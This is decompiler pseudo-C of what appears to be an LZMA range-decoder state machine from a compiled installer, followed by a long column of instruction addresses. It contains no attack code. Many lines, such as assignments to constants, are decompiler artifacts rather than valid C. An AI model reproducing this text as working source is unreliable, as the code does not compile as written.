                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								goto L89;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *(__ebp - 0x60);
                                                                                                                                                              							if( *(__ebp - 0x60) == 0) {
                                                                                                                                                              								goto L171;
                                                                                                                                                              							}
                                                                                                                                                              							__eax = 0;
                                                                                                                                                              							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                              							__eflags = _t258;
                                                                                                                                                              							0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                              							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                              							goto L75;
                                                                                                                                                              						case 0xa:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                              								__ecx =  *(__ebp - 0x38);
                                                                                                                                                              								 *(__ebp - 0x84) = 0xb;
                                                                                                                                                              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              								goto L132;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 0x28);
                                                                                                                                                              							goto L88;
                                                                                                                                                              						case 0xb:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								__ecx =  *(__ebp - 0x24);
                                                                                                                                                              								__eax =  *(__ebp - 0x20);
                                                                                                                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              							} else {
                                                                                                                                                              								__eax =  *(__ebp - 0x24);
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x28);
                                                                                                                                                              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              							L88:
                                                                                                                                                              							__ecx =  *(__ebp - 0x2c);
                                                                                                                                                              							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              							L89:
                                                                                                                                                              							__eax =  *(__ebp - 4);
                                                                                                                                                              							 *(__ebp - 0x80) = 0x15;
                                                                                                                                                              							__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                              							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                              							goto L68;
                                                                                                                                                              						case 0xc:
                                                                                                                                                              							L99:
                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0xc;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							_t334 = __ebp - 0x70;
                                                                                                                                                              							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              							__eflags =  *_t334;
                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							__eax =  *(__ebp - 0x2c);
                                                                                                                                                              							goto L101;
                                                                                                                                                              						case 0xd:
                                                                                                                                                              							goto L36;
                                                                                                                                                              						case 0xe:
                                                                                                                                                              							goto L45;
                                                                                                                                                              						case 0xf:
                                                                                                                                                              							goto L57;
                                                                                                                                                              						case 0x10:
                                                                                                                                                              							L109:
                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0x10;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							_t365 = __ebp - 0x70;
                                                                                                                                                              							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              							__eflags =  *_t365;
                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							goto L111;
                                                                                                                                                              						case 0x11:
                                                                                                                                                              							L68:
                                                                                                                                                              							__esi =  *(__ebp - 0x58);
                                                                                                                                                              							 *(__ebp - 0x84) = 0x12;
                                                                                                                                                              							goto L132;
                                                                                                                                                              						case 0x12:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								__eax =  *(__ebp - 0x58);
                                                                                                                                                              								 *(__ebp - 0x84) = 0x13;
                                                                                                                                                              								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                              								goto L132;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 0x4c);
                                                                                                                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              							__eflags = __eax;
                                                                                                                                                              							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                              							goto L130;
                                                                                                                                                              						case 0x13:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								_t469 = __ebp - 0x58;
                                                                                                                                                              								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                              								__eflags =  *_t469;
                                                                                                                                                              								 *(__ebp - 0x30) = 0x10;
                                                                                                                                                              								 *(__ebp - 0x40) = 8;
                                                                                                                                                              								L144:
                                                                                                                                                              								 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                              								goto L145;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 0x4c);
                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              							 *(__ebp - 0x30) = 8;
                                                                                                                                                              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                              							L130:
                                                                                                                                                              							 *(__ebp - 0x58) = __eax;
                                                                                                                                                              							 *(__ebp - 0x40) = 3;
                                                                                                                                                              							goto L144;
                                                                                                                                                              						case 0x14:
                                                                                                                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                              							__eax =  *(__ebp - 0x80);
                                                                                                                                                              							goto L140;
                                                                                                                                                              						case 0x15:
                                                                                                                                                              							__eax = 0;
                                                                                                                                                              							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              							__al = __al & 0x000000fd;
                                                                                                                                                              							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              							goto L120;
                                                                                                                                                              						case 0x16:
                                                                                                                                                              							__eax =  *(__ebp - 0x30);
                                                                                                                                                              							__eflags = __eax - 4;
                                                                                                                                                              							if(__eax >= 4) {
                                                                                                                                                              								_push(3);
                                                                                                                                                              								_pop(__eax);
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 4);
                                                                                                                                                              							 *(__ebp - 0x40) = 6;
                                                                                                                                                              							__eax = __eax << 7;
                                                                                                                                                              							 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                              							 *(__ebp - 0x58) = __eax;
                                                                                                                                                              							goto L145;
                                                                                                                                                              						case 0x17:
                                                                                                                                                              							L145:
                                                                                                                                                              							__eax =  *(__ebp - 0x40);
                                                                                                                                                              							 *(__ebp - 0x50) = 1;
                                                                                                                                                              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                              							goto L149;
                                                                                                                                                              						case 0x18:
                                                                                                                                                              							L146:
                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0x18;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							_t484 = __ebp - 0x70;
                                                                                                                                                              							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              							__eflags =  *_t484;
                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							L148:
                                                                                                                                                              							_t487 = __ebp - 0x48;
                                                                                                                                                              							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              							__eflags =  *_t487;
                                                                                                                                                              							L149:
                                                                                                                                                              							__eflags =  *(__ebp - 0x48);
                                                                                                                                                              							if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              								__ecx =  *(__ebp - 0x40);
                                                                                                                                                              								__ebx =  *(__ebp - 0x50);
                                                                                                                                                              								0 = 1;
                                                                                                                                                              								__eax = 1 << __cl;
                                                                                                                                                              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                              								__eax =  *(__ebp - 0x7c);
                                                                                                                                                              								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              								goto L140;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 0x50);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              							__eax =  *(__ebp - 0x58);
                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              								__cx = __ax;
                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                              								__eax = __eax - __ecx;
                                                                                                                                                              								__edx = __edx + 1;
                                                                                                                                                              								__eflags = __edx;
                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                              								 *(__ebp - 0x50) = __edx;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              								goto L148;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L146;
                                                                                                                                                              							}
                                                                                                                                                              						case 0x19:
                                                                                                                                                              							__eflags = __ebx - 4;
                                                                                                                                                              							if(__ebx < 4) {
                                                                                                                                                              								 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                              								L119:
                                                                                                                                                              								_t393 = __ebp - 0x2c;
                                                                                                                                                              								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                              								__eflags =  *_t393;
                                                                                                                                                              								L120:
                                                                                                                                                              								__eax =  *(__ebp - 0x2c);
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                              									goto L170;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                              								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                              									goto L171;
                                                                                                                                                              								}
                                                                                                                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                              								__eax =  *(__ebp - 0x30);
                                                                                                                                                              								_t400 = __ebp - 0x60;
                                                                                                                                                              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                              								__eflags =  *_t400;
                                                                                                                                                              								goto L123;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = __ebx;
                                                                                                                                                              							__eax = __ebx;
                                                                                                                                                              							__ecx = __ebx >> 1;
                                                                                                                                                              							__eax = __ebx & 0x00000001;
                                                                                                                                                              							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                              							__al = __al | 0x00000002;
                                                                                                                                                              							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                              							__eflags = __ebx - 0xe;
                                                                                                                                                              							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              							if(__ebx >= 0xe) {
                                                                                                                                                              								__ebx = 0;
                                                                                                                                                              								 *(__ebp - 0x48) = __ecx;
                                                                                                                                                              								L102:
                                                                                                                                                              								__eflags =  *(__ebp - 0x48);
                                                                                                                                                              								if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              									__eax = __eax + __ebx;
                                                                                                                                                              									 *(__ebp - 0x40) = 4;
                                                                                                                                                              									 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              									__eax =  *(__ebp - 4);
                                                                                                                                                              									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									L108:
                                                                                                                                                              									__ebx = 0;
                                                                                                                                                              									 *(__ebp - 0x58) = __eax;
                                                                                                                                                              									 *(__ebp - 0x50) = 1;
                                                                                                                                                              									 *(__ebp - 0x44) = 0;
                                                                                                                                                              									 *(__ebp - 0x48) = 0;
                                                                                                                                                              									L112:
                                                                                                                                                              									__eax =  *(__ebp - 0x40);
                                                                                                                                                              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                              										_t391 = __ebp - 0x2c;
                                                                                                                                                              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                              										__eflags =  *_t391;
                                                                                                                                                              										goto L119;
                                                                                                                                                              									}
                                                                                                                                                              									__eax =  *(__ebp - 0x50);
                                                                                                                                                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              									__eax =  *(__ebp - 0x58);
                                                                                                                                                              									__esi = __edi + __eax;
                                                                                                                                                              									 *(__ebp - 0x54) = __esi;
                                                                                                                                                              									__ax =  *__esi;
                                                                                                                                                              									__ecx = __ax & 0x0000ffff;
                                                                                                                                                              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                              									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                              										__ecx = 0;
                                                                                                                                                              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                              										__ecx = 1;
                                                                                                                                                              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              										__ebx = 1;
                                                                                                                                                              										__ecx =  *(__ebp - 0x48);
                                                                                                                                                              										__ebx = 1 << __cl;
                                                                                                                                                              										__ecx = 1 << __cl;
                                                                                                                                                              										__ebx =  *(__ebp - 0x44);
                                                                                                                                                              										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                              										__cx = __ax;
                                                                                                                                                              										__cx = __ax >> 5;
                                                                                                                                                              										__eax = __eax - __ecx;
                                                                                                                                                              										__edi = __edi + 1;
                                                                                                                                                              										__eflags = __edi;
                                                                                                                                                              										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              										 *__esi = __ax;
                                                                                                                                                              										 *(__ebp - 0x50) = __edi;
                                                                                                                                                              									} else {
                                                                                                                                                              										 *(__ebp - 0x10) = __edx;
                                                                                                                                                              										0x800 = 0x800 - __ecx;
                                                                                                                                                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              										 *__esi = __dx;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              										L111:
                                                                                                                                                              										_t368 = __ebp - 0x48;
                                                                                                                                                              										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                              										__eflags =  *_t368;
                                                                                                                                                              										goto L112;
                                                                                                                                                              									} else {
                                                                                                                                                              										goto L109;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								__ecx =  *(__ebp - 0xc);
                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                              									__ecx =  *(__ebp - 0x10);
                                                                                                                                                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              									__ebx = __ebx | 0x00000001;
                                                                                                                                                              									__eflags = __ebx;
                                                                                                                                                              									 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              									L101:
                                                                                                                                                              									_t338 = __ebp - 0x48;
                                                                                                                                                              									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              									__eflags =  *_t338;
                                                                                                                                                              									goto L102;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L99;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__edx =  *(__ebp - 4);
                                                                                                                                                              							__eax = __eax - __ebx;
                                                                                                                                                              							 *(__ebp - 0x40) = __ecx;
                                                                                                                                                              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                              							goto L108;
                                                                                                                                                              						case 0x1a:
                                                                                                                                                              							goto L55;
                                                                                                                                                              						case 0x1b:
                                                                                                                                                              							L75:
                                                                                                                                                              							__eflags =  *(__ebp - 0x64);
                                                                                                                                                              							if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 0x14);
                                                                                                                                                              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              							__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              							}
                                                                                                                                                              							__edx =  *(__ebp - 8);
                                                                                                                                                              							__cl =  *(__eax + __edx);
                                                                                                                                                              							__eax =  *(__ebp - 0x14);
                                                                                                                                                              							 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              							 *(__eax + __edx) = __cl;
                                                                                                                                                              							__eax = __eax + 1;
                                                                                                                                                              							__edx = 0;
                                                                                                                                                              							_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              							__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              							__edx = _t274;
                                                                                                                                                              							__eax =  *(__ebp - 0x68);
                                                                                                                                                              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              							_t283 = __ebp - 0x64;
                                                                                                                                                              							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                              							__eflags =  *_t283;
                                                                                                                                                              							 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              							goto L79;
                                                                                                                                                              						case 0x1c:
                                                                                                                                                              							while(1) {
                                                                                                                                                              								L123:
                                                                                                                                                              								__eflags =  *(__ebp - 0x64);
                                                                                                                                                              								if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              									break;
                                                                                                                                                              								}
                                                                                                                                                              								__eax =  *(__ebp - 0x14);
                                                                                                                                                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              								}
                                                                                                                                                              								__edx =  *(__ebp - 8);
                                                                                                                                                              								__cl =  *(__eax + __edx);
                                                                                                                                                              								__eax =  *(__ebp - 0x14);
                                                                                                                                                              								 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              								 *(__eax + __edx) = __cl;
                                                                                                                                                              								__eax = __eax + 1;
                                                                                                                                                              								__edx = 0;
                                                                                                                                                              								_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              								__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              								__edx = _t414;
                                                                                                                                                              								__eax =  *(__ebp - 0x68);
                                                                                                                                                              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                              								__eflags =  *(__ebp - 0x30);
                                                                                                                                                              								 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              								 *(__ebp - 0x14) = __edx;
                                                                                                                                                              								if( *(__ebp - 0x30) > 0) {
                                                                                                                                                              									continue;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L80;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                              							goto L170;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}













                                                                                                                                                              0x00406018
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061ee
                                                                                                                                                              0x004061f1
                                                                                                                                                              0x004061f4
                                                                                                                                                              0x004061f7
                                                                                                                                                              0x004061fa
                                                                                                                                                              0x004061fd
                                                                                                                                                              0x00406200
                                                                                                                                                              0x00406203
                                                                                                                                                              0x00406209
                                                                                                                                                              0x00406221
                                                                                                                                                              0x00406224
                                                                                                                                                              0x00406227
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622d
                                                                                                                                                              0x00406233
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x00406213
                                                                                                                                                              0x00406218
                                                                                                                                                              0x0040621a
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x0040623d
                                                                                                                                                              0x00406240
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061c2
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x004061c8
                                                                                                                                                              0x004061cb
                                                                                                                                                              0x004061ce
                                                                                                                                                              0x004061d2
                                                                                                                                                              0x004061d5
                                                                                                                                                              0x004061db
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061e0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004061e0
                                                                                                                                                              0x00405ffa
                                                                                                                                                              0x00405ffa
                                                                                                                                                              0x00405ffd
                                                                                                                                                              0x00406003
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406008
                                                                                                                                                              0x0040600b
                                                                                                                                                              0x0040600d
                                                                                                                                                              0x0040600e
                                                                                                                                                              0x00406011
                                                                                                                                                              0x0040607e
                                                                                                                                                              0x0040607e
                                                                                                                                                              0x00406082
                                                                                                                                                              0x00406085
                                                                                                                                                              0x00406088
                                                                                                                                                              0x0040608b
                                                                                                                                                              0x0040608e
                                                                                                                                                              0x0040608f
                                                                                                                                                              0x00406092
                                                                                                                                                              0x00406094
                                                                                                                                                              0x0040609a
                                                                                                                                                              0x0040609d
                                                                                                                                                              0x004060a0
                                                                                                                                                              0x004060a3
                                                                                                                                                              0x004060a6
                                                                                                                                                              0x004060ac
                                                                                                                                                              0x004060c8
                                                                                                                                                              0x004060cb
                                                                                                                                                              0x004060ce
                                                                                                                                                              0x004060d1
                                                                                                                                                              0x004060d8
                                                                                                                                                              0x004060de
                                                                                                                                                              0x004060e2
                                                                                                                                                              0x004060ae
                                                                                                                                                              0x004060ae
                                                                                                                                                              0x004060b2
                                                                                                                                                              0x004060ba
                                                                                                                                                              0x004060bf
                                                                                                                                                              0x004060c1
                                                                                                                                                              0x004060c3
                                                                                                                                                              0x004060c3
                                                                                                                                                              0x004060ec
                                                                                                                                                              0x004060ef
                                                                                                                                                              0x00406066
                                                                                                                                                              0x00406066
                                                                                                                                                              0x0040606c
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x00406125
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406127
                                                                                                                                                              0x0040612a
                                                                                                                                                              0x0040612d
                                                                                                                                                              0x00406130
                                                                                                                                                              0x00406133
                                                                                                                                                              0x00406136
                                                                                                                                                              0x00406139
                                                                                                                                                              0x0040613c
                                                                                                                                                              0x0040613f
                                                                                                                                                              0x00406145
                                                                                                                                                              0x0040615d
                                                                                                                                                              0x00406160
                                                                                                                                                              0x00406163
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406169
                                                                                                                                                              0x0040616f
                                                                                                                                                              0x00406147
                                                                                                                                                              0x00406147
                                                                                                                                                              0x0040614f
                                                                                                                                                              0x00406154
                                                                                                                                                              0x00406156
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406179
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x004060fa
                                                                                                                                                              0x004060fe
                                                                                                                                                              0x004067be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067be
                                                                                                                                                              0x00406104
                                                                                                                                                              0x00406107
                                                                                                                                                              0x0040610a
                                                                                                                                                              0x0040610e
                                                                                                                                                              0x00406111
                                                                                                                                                              0x00406117
                                                                                                                                                              0x00406119
                                                                                                                                                              0x00406119
                                                                                                                                                              0x0040611c
                                                                                                                                                              0x0040611c
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406187
                                                                                                                                                              0x00406187
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x00406191
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00406197
                                                                                                                                                              0x0040619a
                                                                                                                                                              0x0040619d
                                                                                                                                                              0x004061a0
                                                                                                                                                              0x004061a3
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061a9
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061ae
                                                                                                                                                              0x004061b1
                                                                                                                                                              0x004061b4
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x00406308
                                                                                                                                                              0x0040630a
                                                                                                                                                              0x0040630e
                                                                                                                                                              0x0040630e
                                                                                                                                                              0x00406311
